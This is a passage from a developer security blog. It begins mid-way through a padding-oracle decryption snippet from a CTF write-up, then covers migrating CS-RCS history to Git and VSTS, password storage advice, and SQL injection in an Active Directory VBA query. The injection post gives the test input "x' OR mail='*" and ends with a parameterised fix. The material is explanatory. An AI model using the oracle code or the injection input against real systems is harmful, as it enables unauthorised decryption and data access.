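                still_ok = oracle(bytes(forged), cur)
                forged[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle rejected every value")
    return bytes(a ^ b for a, b in zip(inter, prev))

# Set up a block pair the way the server side would have produced it.
target = b"padding oracles!"
c_cur = bytes(range(16))
c_prev = bytes(a ^ b for a, b in zip(d_k(c_cur), target))
print(recover_block(c_prev, c_cur))   # b'padding oracles!'
```

At worst that is 256 oracle calls per byte, plus one confirmation call on the last byte.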

Code, or it didn’t happen

So here’s the 200 lines or so that I wrote on the bus. I also wrote a test harness so that this would work even after the CTF finished and got shut down. You’ll find that in the same repo.

I’ve massaged the code so it’s easier to understand, or to use as an explainer for what’s going on.

I plan on expanding this in a couple of ways – first, to make it essentially command-line compatible with ‘PadBuster’, and second, to produce a graphical demo of how the cracking happens.

And in the next post, I’m going to talk a little about how I optimised this code, so that it was nearly 15x faster than PadBuster.

Final parts of the Git move – VSTS

I’ve posted before how I’d like to get my source code out of the version control system I used to use, because it was no longer supported by the manufacturer, and into something else.

I chose git, in large part because it uses an open format, and as such isn’t going to suffer the same problem I had with ComponentSoftware’s CS-RCS.

Now that I’ve figured out how to use Bash on Ubuntu on Windows to convert from CS-RCS to git, using the rcs-fast-export.rb script, I’m also looking to protect my source control investment by storing it somewhere off-site.

This has a couple of good benefits – one is that I’ll have access to it when I’m away from my home machine, another is that I’ll be able to handle catastrophic outages, and a third is that I’ll be able to share more easily with co-conspirators.

I’m going to use Visual Studio Team Services (VSTS), formerly known as Visual Studio Online, previous to that, as Team Foundation Services Online. You can install VSTS on your own server, or you can use the online tool at <yourdomain>.visualstudio.com. If your team is smaller than five people, you can do this for free, just like you can use Visual Studio 2015 Community Edition for free. This is a great way in which Microsoft supports hobbyist developers, open source projects, college students, etc.

Where do we start?

After my last post on the topic, you have used git and rcs-fast-export.rb to create a Git repository.

You may even have done a “git checkout” command to get the source code into a place where you can work on it. That’s not necessary for our synchronisation to VSTS, because we’re going to sync the entire repository. This will work whether you are using the Bash shell or the regular Command Prompt, as long as you have git installed and in your PATH.

If you’ve actually made any changes, be sure to add and commit them to the local Git repository. We don’t want to lose those!

I’m also going to assume you have a VSTS account. First, visit the home page.

[Screenshot: VSTS home page]

Under “Recent Projects & Teams”, click “New”.

Give it a name and a description – I suggest leaving the other settings at their default of “Agile” and “Git” unless you have reason to change. The setting of “Git” in particular is required if you’re following along, because that’s how we’re going to synchronise next.

[Screenshot: new project settings]

When you click “Create project”, it’ll think for a while…

[Screenshot: project creation in progress]

And then you’ll have the ability to continue on. Not sure my team’s actually “going to love this”, considering it’s just me!

[Screenshot: project created dialog]

Yes, it’s not just your eyes, the whole dialog moved down the screen, so you can’t hover over the button waiting to hit it.

Click “Navigate to project”, and you’ll discover that there’s a lot waiting for you. Fortunately a quick popup gives you the two most likely choices you’ll have for any new project.

[Screenshot: new project popup]

As my team-mates will attest, I don’t do Kanban very well, so we’ll ignore that side of things; I’m mostly using this just to track my source code. So, hit “Add Code”, and you get this:

[Screenshot: the “Add Code” page]

Some interesting options here

Don’t choose any yet :)

“Clone to your computer” – an odd choice of the direction to use, since this is an empty source directory. But, since it has a “Clone in Visual Studio” button, this may be an easy way to go if you already have a Visual Studio project working with Git that you want to tie into this. There is a problem with this, however: if you’re working with multiple versions of Visual Studio, any attempt from VSTS to open Visual Studio will only open the most recently installed version. I found no way to make Visual Studio 2013 automatically open from the web for Visual Studio 2013 projects, although the Visual Studio Version Selector will make the right choice if you double click the SLN file.

“Push an existing repository from command line” – this is what I used. A simple press of the “Copy to clipboard” button gives me the right commands to feed to my command shell. You should run these commands from somewhere in your workspace; I would suggest the root of the workspace, so you can check to see that you have a .git folder to import before you run the commands.

BUT – I would strongly recommend not dismissing this screen while you run these commands: you can’t come back to it later, and you’ll want to add a .gitignore file.

The other options are:

“Import a repository” – this is if you’re already hosting your git repository on some other web site (like Github, etc), and want to make a copy here. This isn’t a place for uploading a fast-import file, sadly, or we could shortcut the git process locally. (Hey, Microsoft, you missed a trick!)

“Initialize with a README or gitignore” – a useful couple of things to do. A README.md file is associated with git projects, and instructs newcomers to the project about it – how to build it, what it’s for, where to find documentation, etc, etc – and you can add this at any time. The .gitignore file tells git which file names and extensions not to bother putting into version control: object files, executables, temporary files, machine generated code, PCH & PDB files, etc, etc. You can see the list is long, and there’s no way to add a .gitignore file with a single button click after you’ve left this page. You can steal one from an empty project, by simply copying it – but the button press is easier.

What I’ve found

I’ve found it useful to run the “git remote” and “git push” commands from the command-line (and I choose to run them from the Bash window, because I’m already there after running the RCS export), and then add the .gitignore. So, I copy the commands and send them to the shell window, before I press the “Add a .gitignore” button, choose “Visual Studio” as my gitignore type, and then select “Initialize”:

First, let’s start with a recap of using the rcs-fast-export command to bring the code over from the old RCS to a new Git repository:

capture20161124145136450

Commands in that window:

  • cd workspace/
  • mkdir Juggler
  • cd Juggler
  • ../rcs-fast-export.rb -A ../AuthorsFile /mnt/c/RCS/c/stress/Juggler > Juggler.gx
  • git init
  • git fast-import < Juggler.gx

capture20161124145146126

Commands:

  • git reset

capture20161124145151824

No commands – we’ve imported and are ready to sync up to the VSTS server.

capture20161124145332778

Commands (copied from the “Add Code” window):

capture20161124145452345

But that’s not quite all…

Your solution still has lines in it dictating what version control you’re using. So you want to unbind that.

[If you don’t unbind existing version control, you won’t be able to use the built-in version control features in Visual Studio, and you’ll keep getting warnings from your old version control software. When you uninstall your old version control software, Visual Studio will refuse to load your projects. So, unbinding your old version control is really important!]

I like to do that in a different directory from the original, for two reasons:

  1. I don’t want to overwrite or delete the working workspace I’ve been working in until the new workspace works. So I still have the old directory to work from if I need to, while I’m moving to the new place.
  2. I want to make sure that a developer (even if it’s just me six months from now, after I’ve wiped everything in a freak electromagnet accident) can connect to this version control source, and build everything.

So, now it’s Command Prompt window time…

capture20161124150214538

Yes, you could do that from Visual Studio, but it’s just as easy from the command line. Note that I didn’t actually enter credentials here – they’re cached by Windows.

Commands entered in that window:

  • md workspace/Juggler
  • cd workspace/Juggler
  • git clone https://<yourdomain>.visualstudio.com/DefaultCollection/_git/Juggler .
  • Juggler2.sln

Your version control system may complain when opening this project that it’s not in the place it remembers being in… I know mine does. Tell it that’s OK.

capture20161124151354750

[Yes, I’ve changed projects, from Juggler to EFSExt. I suddenly realised that Juggler is for Visual Studio 2010, which is old, and not installed on this system.]

Now that we’ve opened the solution in Visual Studio, it’s time to unbind the old source control. This is done by visiting the File => Source Control => Change Source Control menu option:

capture20161124151700000

You’ll get a dialog that lists every project in this solution. You need to select every project that has a check-mark in the “Connected” column, and click the “Unbind” button.

Luckily, in this case, they’re already selected for me, and I just have to click “Unbind”:

capture20161124151846349

You are warned:

capture20161124152055066

Note that this unbinding happens in the local copy of the SLN and VCPROJ, etc files – it’s not actually going to make any changes to your version control. [But you made a backup anyway, because you’re cautious, right?]

Click “Unbind” and the dialog changes:

capture20161124152229664

Click OK, and we’re nearly there…

Finally, we have to sync this up to the Git server. And to do that, we have to change the Source Control option (which was set when we first loaded the project) to Git.

This is under Tools => Options => Source Control. Select the “Microsoft Git Provider” (or in Visual Studio 2015, simply “Git”):

capture20161124152800000

Press “OK”. You’ll be warned if your solution is still bound in some part to a previous version control system. This can happen in particular if you have a project which didn’t load, but which is part of this solution. I’m not addressing here what you have to do for that, because it involves editing your project files by hand, or removing projects from the solution. You should decide for yourself which of those steps carries the least risk of losing something important. Remember that you still have your files and their history in at least THREE version control systems at this point – your old version control, the VSTS system, and the local Git repository. So even if you screw this up, there’s little real risk.

Now that you have Git selected as your solution provider, you’ll see that the “Changes” option is now available in the Team Explorer window:

capture20161124153434632

Save all the files (but I don’t have any open!) by pressing Ctrl-Shift-S, or selecting File => Save All.

If you skip this step, there will be no changes to commit, and you will be confused.

Select “Changes”, and you’ll see that the SLN files and VCPROJ files have been changed. You can preview these changes, but they basically are to do with removing the old version control from the projects and solution.

capture20161124153724095

It wants a commit message. This should be short and explanatory. I like “Removed references to old version control from solution”. Once you’ve entered a commit message, the Commit button is available. Click it.

It now prompts you to Sync to the server.

capture20161124153910915

So click the highlighted word, “Sync”, to see all the unsynced commits – you should only have one at this point, but as you can imagine, if you make several commits before syncing, these can pile up.

capture20161124154006176

Press the “Sync” button to send the commit up to the server. This is also how you should usually get changes others have made to the code on the server. Note that “others” could simply mean “you, from a different computer or repository”.

Check on the server that the history on the branch now mentions this commit, so that you know your syncing works well.

And you’re done

Sure, it seems like a long-winded process, but most of what I’ve included here is pictures of me doing stuff, and the stuff I’m doing is only done once, when you create the repository and populate it from another. Once it’s in VSTS, I recommend building your solution, to make sure it still builds. Run whatever tests you have to make sure that you didn’t break the build. Make sure that you still have valid history on all your files, especially binary files. If you don’t have valid history on any files in particular, check the original version control, to see if you ever did have. I found that my old CS-RCS implementation was storing .bmp files as text, so the current version was always fine, but the history was corrupted. That’s history I can’t retrieve, even with the new source control.

Now, what about those temporary repositories? Git makes things really easy – the Git repository is in a directory off the root of the workspace, called “.git”. It’s hidden, but if you want to delete the repository, just delete the “.git” folder and its contents. You can delete any temporary workspaces the same way, of course.

I did spend a little time automating the conversion of multiple repositories to Git, but that was rather ad-hoc and wobbly, so I’m not posting it here. I’d love to think that some of the rest of this could be automated, but I have only a few projects, so it was good to do by hand.

Final Statement

No programmer should be running an unsupported, unpatched, unupdated old version control system. That’s risky, not just from a security perspective, but from the perspective that it may screw up your files, as you vary the sort of projects you build.

No programmer should be required to drop their history when moving to a new version control system. There is always a way to move your history. Maybe that way is to hire a grunt developer to fetch versions dated at random/significant dates throughout history out of the old version control system, and check them in to the new version control system. Maybe you can write automation around that. Or maybe you’ll be lucky and find that someone else has already done the automation work for you.

Hopefully I’ve inspired you to take the plunge of moving to a new version control system, and you’ve successfully managed to bring all your precious code history with you. By using Visual Studio Team Services, you’ve also got a place to track features and bugs, and collaborate with other members of a development team, if that’s what you choose to do. Because you’ve chosen Git, you can separate the code and history at any time from the issue tracking systems, should you choose to do so.

Let me know how (if?) it worked for you!

Got on with Git

In which I move my version control from ComponentSoftware’s CS-RCS Pro to Git while preserving commit history.

[If you don’t want the back story, click here for the instructions!]

OK, so having watched the video I linked to earlier, I thought I’d move some of my old projects to Git.

I picked one at random, and went looking for tools.

I’m hampered a little by the fact that all my old projects used ComponentSoftware’s “CS-RCS Pro”.

Why did you choose CS-RCS Pro?

A couple of really good reasons:

  • It works on Windows
  • It integrates moderately well with Visual Studio through the VSS functionality
  • It’s compatible with GNU RCS, which I had some familiarity with
  • It was free if you’re the only dev on your projects

But you know who doesn’t use CS-RCS Pro any more?

That’s right, ComponentSoftware.

It’s a dead platform, unsupported, unpatched, and belongs off my systems.

So why’s it still there?

One simple reason – if I move off the platform, I face the usual choice when migrating from one version control system to another:

  • Carry all my history, so that I can review earlier versions of the code (for instance, when someone says they’ve got a new bug that never happened in the old version, or when I find a reversion, or when there’s a fix needed in one area of the code tree that I know I already made in a different area and just need to copy)
  • Lose all the history by starting fresh with the working copy of the source code

The second option seems a bit of a waste to me.

OK, so yes, technically I could mix the two modes, by using CS-RCS Pro to browse the ancient history when I need to, and Git to browse recent history, after starting Git from a clean working folder. But I could see a couple of problems:

  • Of course the bug I’m looking through history for is going to be across the two source control packages
  • It would mean I still have CS-RCS Pro sitting around installed, unpatched and likely vulnerable, on one of my dev systems

So, really, I wanted to make sure that I could move my files, history and all.

What stopped you?

I really didn’t have a good way to do it.

Clearly, any version control system can be moved to any other version control system by the simple expedient of:

  • For each change X:
    • Set the system date to X’s date
    • Fetch the old source control’s files from X into the workspace
    • Commit changes to the new source control, with any comments from X
    • Next change

But, as you can imagine, that’s really long-winded and manual. That should be automatable.
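As a rough sketch of what that automation might look like, here is the loop above in Python. Treat it as an illustration under stated assumptions, not a finished tool: `Change` and `plan_replay` are names made up for this example, the step that fetches each change’s files from the old system is deliberately left out (it depends entirely on the system being left behind), and instead of changing the system clock it relies on Git’s `GIT_AUTHOR_DATE` and `GIT_COMMITTER_DATE` environment variables. It only builds the list of commands; it doesn’t run anything.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Change:
    """One check-in from the old system (hypothetical shape, for illustration)."""
    date: str      # ISO 8601, e.g. "2009-03-14T15:09:26"
    author: str    # "Name <email>" form, as Git expects
    comment: str


def plan_replay(changes: List[Change]) -> List[Tuple[Dict[str, str], List[str]]]:
    """Return (environment, argv) pairs that would replay the changes in Git.

    Fetching each change's files from the old system is NOT shown; that step
    is specific to whatever version control is being left behind.
    """
    plan = []
    # ISO 8601 strings sort chronologically, so this replays oldest first.
    for change in sorted(changes, key=lambda c: c.date):
        env = {
            # Git reads these instead of the clock, so the system date
            # doesn't need to be touched.
            "GIT_AUTHOR_DATE": change.date,
            "GIT_COMMITTER_DATE": change.date,
        }
        plan.append((env, ["git", "add", "--all"]))
        plan.append((env, ["git", "commit", "--author", change.author,
                           "-m", change.comment]))
    return plan
```

Each pair could be handed to `subprocess.run(argv, env={**os.environ, **env})` once the files for that change are in the workspace.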

In fact, given the shared APIs of VSS-compatible source control services, I’m truly surprised that nobody has yet written a tool to do basically this task. I’d get on it myself, but I have other things to do. Maybe someone will write a “VSS2Git” or “VSS2VSS” toolkit to do just this.

There is a format for creating a single-file copy of a Git repository, which Git can process using the command “git fast-import”. So all I have to find is a tool that goes from a CS-RCS repository to the fast-import file format.
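To give a feel for what that file format looks like, here is a minimal Python sketch that builds a single `commit` command for a fast-import stream, with the file content supplied inline. The function name `fast_import_commit` and its parameters are invented for this illustration, and it covers only the simplest case (one file, one commit, UTC timestamps); the real rcs-fast-export script handles far more than this.

```python
def fast_import_commit(path: str, content: bytes, message: str,
                       author: str, timestamp: int,
                       branch: str = "refs/heads/master") -> bytes:
    """Build one 'commit' command for a git fast-import stream.

    author is "Name <email>"; timestamp is seconds since the Unix epoch.
    """
    msg = message.encode("utf-8")
    ident = f"{author} {timestamp} +0000".encode("utf-8")
    return b"".join([
        b"commit " + branch.encode("utf-8") + b"\n",
        b"author " + ident + b"\n",
        b"committer " + ident + b"\n",
        # 'data' is followed by an exact byte count, then the raw bytes.
        b"data %d\n" % len(msg), msg, b"\n",
        # 'M <mode> inline <path>' means the file content follows directly.
        b"M 100644 inline " + path.encode("utf-8") + b"\n",
        b"data %d\n" % len(content), content, b"\n",
    ])
```

Writing the returned bytes to a file gives something that `git fast-import` should accept on standard input in a freshly initialised repository.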

Nobody uses CS-RCS Pro

So, clearly there’s no tool to go from CS-RCS Pro to Git. There’s a tool to go from CS-RCS Pro to CVS, or there was, but that was on the now-defunct CS-RCS web site.

But… Remember I said that it’s compatible with GNU RCS.

And there’s scripts to go from GNU RCS to Git.

What you waiting for? Do it!

OK, so the script for this is written in Ruby, and as I read it, there seemed to be a few things that made it look like it might be for Linux only.

I really wasn’t interested in making a Linux VM (easy though that may be) just so I could convert my data.

So why are you writing this?

Everything changed with the arrival of the recent Windows 10 Anniversary Update, because along with it came a new component.

bashonubu

Bash on Ubuntu on Windows.

It’s like a Linux VM, without needing a VM, without having to install Linux, and it works really well.

With this, I could get all the tools I needed – GNU RCS, in case I needed it; Ruby; Git command line – and then I could try this out for myself.

Of course, I wouldn’t be publishing this if it wasn’t somewhat successful. But there are some caveats, OK?

Here’s the caveats

I’ve tried this a few times, on ONE of my own projects. This isn’t robustly tested, so if something goes all wrong, please by all means share, and people who are interested (maybe me) will probably offer suggestions, some of them useful. I’m not remotely warrantying this or suggesting it’s perfect. It may wipe your development history out of your one and only copy of version control… so don’t do it on your one and only copy. Make a backup first.

GNU RCS likes to store files in one of two places – either in the same directory as the working files, but with a “,v” pseudo-extension added to the filename, or in a sub-directory off each working folder, called “RCS” and with the same “,v” extension on the files. If you did either of these things, there’s no surprises. But…

CS-RCS Pro doesn’t do this. It has a separate RCS Repository Root. I put mine in C:\RCS, but you may have yours somewhere else. Underneath that RCS Repository Root is a full tree of the drives you’ve used CS-RCS to store (without the “:”), and a tree under that. I really hope you didn’t embed anything too deep, because that might bode ill.
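To make that layout concrete, here is a small Python sketch that maps a Windows working folder to where its history would sit under the RCS Repository Root, expressed as the path you’d use from the bash shell (Windows drives appear under /mnt there). The function name is made up, `C:\RCS` is just my root, and the lower-case drive folder is an assumption based on what my own tree looks like; check yours before trusting it.

```python
from pathlib import PurePosixPath, PureWindowsPath


def rcs_repo_path_in_bash(working_dir: str, repo_root: str = r"C:\RCS") -> str:
    """Map a Windows working folder to its CS-RCS repository folder under /mnt."""
    work = PureWindowsPath(working_dir)
    root = PureWindowsPath(repo_root)
    # The repository tree starts with the drive letter, minus the colon.
    # Assumption: the folder is lower-case, as it is on my system.
    drive_folder = work.drive.rstrip(":").lower()
    repo_dir = root.joinpath(drive_folder, *work.parts[1:])
    # Windows drives are mounted as /mnt/<drive letter> in the bash shell.
    mount = repo_dir.drive.rstrip(":").lower()
    return str(PurePosixPath("/mnt", mount, *repo_dir.parts[1:]))


print(rcs_repo_path_in_bash(r"C:\stress\Juggler"))
```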

Initially, this seemed like a bad thing, but because you don’t actually need the working files for this task, you can pretend that the RCS Repository is actually your working space.

Maybe this is obvious, but it took me a moment of thinking to decide I didn’t have to move files into RCS sub-folders of my working directories.

Make this a “flag day”. After you do this conversion, never use CS-RCS Pro again. It was good, and it did the job, and it’s now buried in the garden next to Old Yeller. Do not sprinkle the zombification water on that hallowed ground to revive it.

This also means you MUST check in all your code before converting, because checking it in afterwards will be … difficult.

Enough already, how do we do this?

Assumption: You have Windows 10.

  1. Install Windows 10 Anniversary Update – this is really easy, it’s an update, you’ve probably been offered it already, and you may even have installed it. This is how you’ll know you have it:
    capture20160826194922505
  2. Install Bash on Ubuntu on Windows – everyone else has written an article on how to do this, so here’s a link (I was going to link to the PC World article, but the full-page ad that popped up and obscured the screen, without letting me click the “no thanks” button persuaded me otherwise).
  3. Run the following commands in the bash shell:
    sudo apt-get update
    sudo apt-get install git
    sudo apt-get install ruby
  4. [Optional] Run “sudo apt-get install rcs”, if you want to use the GNU RCS toolset to play with your original source control tree. Not sure I’d recommend doing too much of that.
  5. Change directory in the bash shell to a new, blank workspace folder you can afford to mess around in.
  6. Now a long bash command, but this really simply downloads the file containing rcs-fast-export:
    curl http://git.oblomov.eu/rcs-fast-export/blob_plain/c8a2bd6edbb21c1bfaf269ad1ec0e82af72c911a:/rcs-fast-export.rb -o rcs-fast-export.rb
  7. Make it executable with the command “chmod +x rcs-fast-export.rb”
  8. Git uses email addresses, rather than owner names, and it insists on them having angle brackets. If your username in CS-RCS Pro was “bob”, and your email address is “kate@example.com”, create an authors file with a bash command like this:
    echo "bob=Kate Smith <kate@example.com>" > AuthorsFile
  9. Now do the actual creation of the file to be imported, with this bash command:
    ./rcs-fast-export.rb -A AuthorsFile /mnt/c/RCS/…path-to-project… > project-name.gitexport
    [Note a couple of things here – starting with “./”, because that isn’t automatically in the PATH in Linux. Your Windows files are logically mounted in drives under /mnt, so C:\RCS is in /mnt/c/RCS. Case is important. Your “…path-to-project…” probably starts with “c/”, so that’s going to look like “/mnt/c/RCS/c/…” which might look awkward, but is correct. Use TAB-completion on folder names to help you.]
  10. Read the errors and correct any interesting ones.
  11. Now import the file into Git. We’re going to initialise a Git repository in the “.git” folder under the current folder, import the file, reset the head, and finally checkout all the files into the “master” branch under the current directory “.”. These are the bash commands to do this:
    git init
    git fast-import < project-name.gitexport
    git reset
    git checkout master .
  12. Profit!
  13. If you’re using Visual Studio and want to connect to this Git repository, remember that your Linux home directory sits under “%userprofile%\appdata\local\lxss\home”

This might look like a lot of instructions, but I mostly just wanted to be clear. This is really quick work. If you screw up after the “git init” command, simply “rm -rf .git” to remove the new repository.

How do you encrypt a password?

I hate when people ask me this question, because I inevitably respond with a half-dozen questions of my own, which makes me seem like a bit of an arse.

To reduce that feeling, because the questions don’t seem to be going away any time soon, I thought I’d write some thoughts out.

Put enough locks on a thing, it's secure. Or it collapses under the weight of the locks.

Do you want those passwords in the first place?

Passwords are important objects – and because people naturally share IDs and passwords across multiple services, your holding on to a customer’s / user’s password means you are a necessary part of that user’s web of credential storage.

It will be a monumental news story when your password database gets disclosed or leaked, and even more of a story if you’ve chosen a bad way of protecting that data. You will lose customers and you will lose business; you may even lose your whole business.

Take a long hard look at what you’re doing, and whether you actually need to be in charge of that kind of risk.

Do you need those passwords to verify a user or to impersonate them?

If you are going to verify a user, you don’t need encrypted passwords, you need hashed passwords. And those hashes must be salted. And the salt must be large and random. I’ll explain why some other time, but you should be able to find much documentation on this topic on the Internet. Specifically, you don’t need to be able to decrypt the password from storage, you need to be able to recognise it when you are given it again. Better still, use an acknowledged good password hashing mechanism like PBKDF2. (Note, from the “2” that it may be necessary to update this if my advice is more than a few months old)
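As a minimal sketch of the “hash, salt, recognise it again” idea, here it is in Python using the standard library’s PBKDF2 implementation. The function names are made up for this example, and the iteration count and salt size are assumptions to tune against current guidance and your own hardware, not recommendations from this post.

```python
import hashlib
import hmac
import os

# Assumption: pick the iteration count from current guidance, and revisit it.
DEFAULT_ITERATIONS = 600_000


def hash_password(password: str, iterations: int = DEFAULT_ITERATIONS):
    """Return (salt, digest) for storage. The password itself is never stored."""
    salt = os.urandom(16)  # large, random, and different for every user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, iterations)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes,
                    iterations: int = DEFAULT_ITERATIONS) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    salt, iterations)
    return hmac.compare_digest(candidate, expected)
```

Note that there is no decrypt step anywhere: the only operation is “hash what I was just given and see if it matches”.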

Now, do not read the rest of this section – skip to the next question.

Seriously, what are you doing reading this bit? Go to the heading with the next question. You don’t need to read the next bit.

<sigh/>

OK, if you are determined that you will have to impersonate a user (or a service account), you might actually need to store the password in a decryptable form.

First make sure you absolutely need to do this, because there are many other ways to impersonate an incoming user using delegation, etc, which don’t require you storing the password.

Explore delegation first.

Finally, if you really have to store the password in an encrypted form, you have to do it incredibly securely. Make sure the key is stored separately from the encrypted passwords, and don’t let your encryption be brute-forcible. A BAD way to encrypt would be to simply encrypt the password using your public key – sure, this means only you can decrypt it, but it means anyone can brute-force an encryption and compare it against the ciphertext.

A GOOD way to encrypt the password is to add some entropy and padding to it (so I can’t tell how long the password was, and I can’t tell if two users have the same password), and then encrypt it.

Password storage mechanisms such as keychains or password vaults will do this for you.

If you don’t have keychains or password vaults, you can encrypt using a function like Windows’ CryptProtectData, or its .NET equivalent, System.Security.Cryptography.ProtectedData.

[Caveat: CryptProtectData and ProtectedData use DPAPI, which requires careful management if you want it to work across multiple hosts. Read the API and test before deploying.]

[Keychains and password vaults often have the same sort of issue with moving the encrypted password from one machine to another.]

For .NET documentation on password vaults in Windows 8 and beyond, see: Windows.Security.Credentials.PasswordVault

For non-.NET on Windows from XP and later, see: CredWrite

For Apple, see documentation on Keychains

Can you choose how strong those passwords must be?

If you’re protecting data in a business, you can probably tell users how strong their passwords must be. Look for measures that correlate strongly with entropy – how long is the password, does it use characters from a wide range (or is it just the letter ‘a’ repeated over and over?), is it similar to any of the most common passwords, does it contain information that is obvious, such as the user’s ID, or the name of this site?
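Those measures could be sketched in Python along these lines. Everything specific here is an assumption for illustration: the function name, the thresholds, and especially the tiny `COMMON_PASSWORDS` sample, which stands in for a real list of leaked passwords and only checks for exact matches rather than similarity.

```python
# Tiny illustrative sample; a real check would use a much larger list.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein"}


def password_problems(password: str, user_id: str, site_name: str,
                      min_length: int = 12) -> list:
    """Return a list of reasons to reject the password (empty means acceptable)."""
    problems = []
    lowered = password.lower()
    if len(password) < min_length:
        problems.append("too short")
    if len(set(password)) < 5:
        # Catches the letter 'a' repeated over and over.
        problems.append("too few distinct characters")
    if lowered in COMMON_PASSWORDS:
        problems.append("common password")
    for obvious in (user_id, site_name):
        if obvious and obvious.lower() in lowered:
            problems.append("contains obvious information")
            break
    return problems
```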

Maybe you can reward customers for longer passwords – even something as simple as a “strong account award” sticker on their profile page can induce good behaviour.

Length is mathematically more important to password entropy than the range of characters. An eight character password chosen from 64 characters (less than three hundred trillion combinations – a number with 4 commas) is weaker than a 64 character password chosen from eight characters (a number of combinations with 19 commas in it).

An 8-character password taken from 64 possible characters is actually as strong as a password only twice as long and chosen from 8 characters – this means something like a complex password at 8 characters in length is as strong as the names of the notes in a couple of bars of your favourite tune.
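The arithmetic behind those claims is easy to check. This short Python sketch (the helper names are mine) counts the combinations, the equivalent bits of entropy, and the number of commas you’d need to write the number out:

```python
import math


def combinations(alphabet_size: int, length: int) -> int:
    """Number of possible passwords of this length from this alphabet."""
    return alphabet_size ** length


def entropy_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits, assuming every character is chosen at random."""
    return length * math.log2(alphabet_size)


def commas(n: int) -> int:
    """How many thousands separators the number needs when written out."""
    return (len(str(n)) - 1) // 3


print(combinations(64, 8), commas(combinations(64, 8)))   # 8 chars from 64
print(commas(combinations(8, 64)))                        # 64 chars from 8
print(entropy_bits(64, 8), entropy_bits(8, 16))           # both 48 bits
```

Doubling the length from 8 to 16 is enough to make up for shrinking the alphabet from 64 characters to 8, because each character from 64 carries 6 bits and each character from 8 carries 3.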

Allowing users to use password safes of their own makes it easier for them to use longer and more complex passwords. This means allowing copy and paste into password fields, and where possible, integrating with any OS-standard password management schemes.

What happens when a user forgets their password?

Everything seems to default to sending a password reset email. This means your users’ email address is equivalent to their credential. Is that strength of association truly warranted?

In the process to change my email address, you should ask me for my password first, or similarly strongly identify me.

What happens when I stop paying my ISP, and they give my email address to a new user? Will they have my account on your site now, too?

Every so often, maybe you should renew the relationship between account and email address – baselining – to ensure that the address still exists and still belongs to the right user.

Do you allow password hints or secret questions?

Password hints push you dangerously into the realm of actually storing passwords. People use hints such as “The password is ‘Oompaloompah’”, so if you store password hints, you must encrypt them as strongly as if you were encrypting the password itself. Because, much of the time, you are. And see the previous rule, which says you want to avoid doing that if at all possible.

Other questions that I’m not answering today…

How do you enforce occasional password changes, and why?

What happens when a user changes their password?

What happens when your password database is leaked?

What happens when you need to change hash algorithm?

SQL injection in unexpected places

Every so often, I write about some real-world problems in this blog, rather than just getting excited about generalities. This is one of those times.

1. In which I am an idiot who thinks he is clever

I had a list of users the other day, exported from a partner with whom we do SSO, and which somehow had some duplicate entries in.

These were not duplicate in the sense of “exactly the same data in every field”, but differed by email address, and sometimes last name. Those of you who manage identity databases will know exactly what I’m dealing with here – people change their last name, through marriage, divorce, adoption, gender reassignment, whim or other reason, and instead of editing the existing entry, a new entry is somehow populated to the list of identities.

What hadn’t changed was that each of these individuals still held their old email address in Active Directory, so all I had to do was look up each email address, relate it to a particular user, and then pull out the canonical email address for that user. [In this case, that’s the first email address returned from AD]

A quick search on the interwebs gave me this as a suggested VBA function to do just that:

    Function GetEmail(email As String) As String
    ' Given one of this user's email addresses, find the canonical one.

    ' Find our default domain base to search from
    Set objRootDSE = GetObject("LDAP://RootDSE")
    strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"

    ' Open a connection to AD
    Set ADOConnection = CreateObject("ADODB.Connection")
    ADOConnection.Provider = "ADsDSOObject"
    ADOConnection.Open "Active Directory Provider"

    ' Create a command
    Set ADCommand = CreateObject("ADODB.Command")
    ADCommand.ActiveConnection = ADOConnection

    ' Find user based on their email address
    ADCommand.CommandText = _
        "SELECT distinguishedName,userPrincipalName,mail FROM " & _
        strBase & " WHERE objectCategory='user' and mail='" & email & "'"

    ' Execute this command
    Set ADRecordSet = ADCommand.Execute

    ' Extract the canonical email address for this user.
    GetEmail = ADRecordSet.Fields("Mail")

    ' Return.
    End Function

That did the trick, and I stopped thinking about it. Printed out the source just to demonstrate to a couple of people that this is not rocket surgery.

2. In which I realise I am idiot

Yesterday the printout caught my eye. Here’s the particular line that made me stop:

    ADCommand.CommandText = _
        "SELECT distinguishedName,userPrincipalName,mail FROM " & _
        strBase & " WHERE objectCategory='user' AND mail='" & email & "'"

That looks like a SQL query, doesn’t it?

Probably because it is.

It’s one of two formats that can be used to query Active Directory, the other being the less-readable LDAP syntax.

Both formats have the same problem – when you build the query using string concatenation like this, it’s possible for the input to give you an injection by escaping from the data and into the code.

I checked this out – when I called this function as follows, I got the first email address in the list as a response:

    Debug.Print GetEmail("x' OR mail='*")

You can see my previous SQL injection articles to come up with ideas of other things I can do now that I’ve got the ability to inject.
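To make the mechanics of that injection concrete, here is the same string concatenation reproduced in Python rather than VBA. It only builds and prints the query text; nothing is sent to Active Directory, and the naming context `DC=example,DC=com` is a made-up placeholder.

```python
def build_query(base: str, email: str) -> str:
    """Build the query text the same (unsafe) way the VBA function does."""
    return ("SELECT distinguishedName,userPrincipalName,mail FROM " + base +
            " WHERE objectCategory='user' AND mail='" + email + "'")


base = "'LDAP://DC=example,DC=com'"  # placeholder naming context

# Intended use: the email stays inside the quotes, as data.
print(build_query(base, "kate@example.com"))

# Injection: the input closes the quote and adds its own condition,
# so the WHERE clause now ends: mail='x' OR mail='*'
print(build_query(base, "x' OR mail='*"))
```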

3. In which I try to be clever again

Normally, I’d suggest developers use Parameterised Queries to solve this problem – and that’s always the best idea, because it not only improves security, but it actually makes the query faster on subsequent runs, because it’s already optimised. Here’s how that ought to look:

    ADCommand.CommandText = _
        "SELECT distinguishedName,userPrincipalName,mail FROM " & _
        strBase & " WHERE objectCategory='user' AND mail=?"

    ' Create and bind parameter
    Set ADParam = ADCommand.CreateParameter("", adVarChar, adParamInput, 40, email)
    ADCommand.Parameters.Append ADParam

